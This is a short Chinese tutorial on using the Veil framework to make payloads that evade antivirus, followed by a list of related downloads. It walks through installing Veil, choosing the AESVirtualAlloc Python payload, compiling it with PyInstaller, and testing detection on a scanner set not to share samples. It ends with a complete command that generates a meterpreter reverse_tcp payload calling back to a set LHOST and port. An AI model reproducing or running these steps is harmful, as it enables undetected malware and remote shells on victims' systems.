`

使用veil绕过杀毒软件

 
阅读更多
git地址:https://github.com/ChrisTruncer/Veil/
# wget https://github.com/ChrisTruncer/Veil/archive/master.zip
# unzip master.zip
# cd Veil-master/setup
# ./setup.sh
# rm -rf setup
运行./Veil

list命令查看荷载内容

本文使用python/AESVirtualAlloc荷载。
use python/AESVirtualAlloc


使用generate命令来生成可执行文件

选择一些默认值。回答一些关于荷载的问题后,Veil将会提问一些关于你想创建的可执行文件的问题。首先提供一个可执行文件的名字,然后指明用PyInstaller或py2exe来创建可执行文件。

选择PyInstaller之后,Veil负责剩下的工作。

使用 http://vscan.novirusthanks.org来检测文件,点击“Do not distribute the sample”
可以使用
./Veil.py -l python -p AESVirtualAlloc -o trytofindthis --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.187.100 LPORT=443
来完成工作。
  • 大小: 94.6 KB
  • 大小: 118.6 KB
  • 大小: 93.8 KB
  • 大小: 130.5 KB
  • 大小: 126.4 KB
  • 大小: 173 KB
分享到:
| nmap cheatsheet
评论
发表评论

您还没有登录,请您登录后再发表评论

相关推荐

    kali安装veil.pdf

    eil Evasion是一个可执行文件,它被用来生成Metasploit的payload,能绕过常见杀软。在kali 2018.1中Veil默认是没有安装的,所以在常用中安装Veil对Metasploit的payload免杀是很重要的。

    Veil-Evasion-master.zip

    Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目。利用它我们可以生成绕过大部分的杀软。从github.com上下实在太慢了,就低积分安利一下。

    Veil-master.zip

    Veil-master.zip

    Veil-Evasion.7z

    对已封装好的payload进行编码,可以很好的绕过防病毒软件的检测,大神必备神器!导入即可!

    免杀工具--veil-evasion

    这个东西下了好久的,用过都知道GitHub下载死慢的,就分享出来赚点积分吧

    Veil-Catapult-master.zip

    Veil-Catapult-masterVeil-Catapult-masterVeil-Catapult-masterVeil-Catapult-master

    Veil-Pillage, 面纱抢劫是一种与面纱回避相结合的邮政.zip

    Veil-Pillage, 面纱抢劫是一种与面纱回避相结合的邮政 #Veil-Pillage面纱抢劫是一个邮政开发框架和一个组成部分的头纱框架。veil pillage由 @harmj0y 构建,目前由 @harmj0y 和团队的帮助支持,目前处于活动状态。...

    工具介绍Veil-Evasion(第十一课).docx

    工具介绍Veil-Evasion(第十一课).docx

    VeilDenpendenices for Veil

    Veil依赖文件

    Veil-Ordnance:Veil-Ordnance是一种旨在快速生成MSF Stager Shellcode的工具

    Veil-Ordnance旨在快速生成可用于漏洞利用或有效载荷的shellcode。 在@ christruncer,@ themightyshiv和@ harmj0y之间进行了多次讨论之后,我们得到了灵感。在这些讨论中,我们确定了需要一种生成shellcode的工具,...

    工具介绍Veil-Evasion(第十一课)1

    (以便截图)ps:本次kali下截图使用scrot//即可以c/meterpreter/rev_tcp为例:ps:Veil-Evasion不在更新,新版本项目地

    veil:愚蠢的加密技巧

    算法与构造Veil使用ChaCha20Poly1305进行身份验证加密,使用Ristretto255 / XDH进行密钥协议和身份验证,使用Elligator2进行难以区分的公共密钥编码,并使用HKDF-SHA-256进行密钥派生。 ChaCha20Poly1305快速,深入...

    【技术分享】恶意框架样本分析-从Veil到Msf .pdf

    【技术分享】恶意框架样本分析-从Veil到Msf 渗透测试 APT 安全实践 AI 网络信息安全

    AVbypass:我在笔测试期间用来规避防病毒的技术

    我写了一些东西来绕过Windows计算机上的AV,这是基于内存技术,常规msf有效负载EXES和Veil-Framework EXES标记Powershell的。 这只是为了突出AV信任使用.Net Assesmblies生成的有效负载的风险。 它不是漏洞,而是...

    veil-project.github.io:veil-project.github.io

    VEIL网站去做使用正确的语言环境名称: : 什么是尾风? “ Tailwind是一种实用程序优先CSS框架,用于快速构建自定义用户界面。” –建立逆风使用清除未使用CSS 运行缩小CSS 建造杰基尔运行进行实时重新加载什么是...

    veil-explore:面纱探索,在CDN或WAF(saas)后找到ip

    面纱探索 面纱探索,在CDN或WAF(saas)后找到ip ...usage: veil-explore.py [-h] [--force] [--max-threads MAX_THREADS] url veil-explore, find ip behind CDN or WAF(saas) positional arguments: url

    Veil-Block-Explorer:面纱的方块探索者

    通过RPC的简单,无数据库的Veil区块链资源管理器。 使用Node.js Express构建,bootstrap-v4。 该工具旨在成为Veil区块链的一个简单的自托管浏览器,由对您自己的veild节点的RPC调用驱动。 该工具易于运行,但与...

    foundry-the-veil:Sistema面纱铸造厂的面纱

    这是The Veil的Foundry代币,经许可创建。 要使用此系统,您需要Foundry 系统并将其放置在Foundry worlds内的文件夹中。 您还具有指向可在Install Mundo中使用的的链接。 在内部,您将找到标题为“贷方和XX设置”...

    Black Veil Brides HD Wallpapers Rock Theme-crx插件

    使用每个新选项卡获取流行摇滚乐队Black Veil Brides的高清图像 即时访问他们的官方社交网站。 黑色面纱新娘是一个非常受欢迎的美国摇滚乐队。 我们在每个新的标签页中都添加了乐队成员的不同高清壁纸。 无论您是在...

Magicbox
Global site tag (gtag.js) - Google Analytics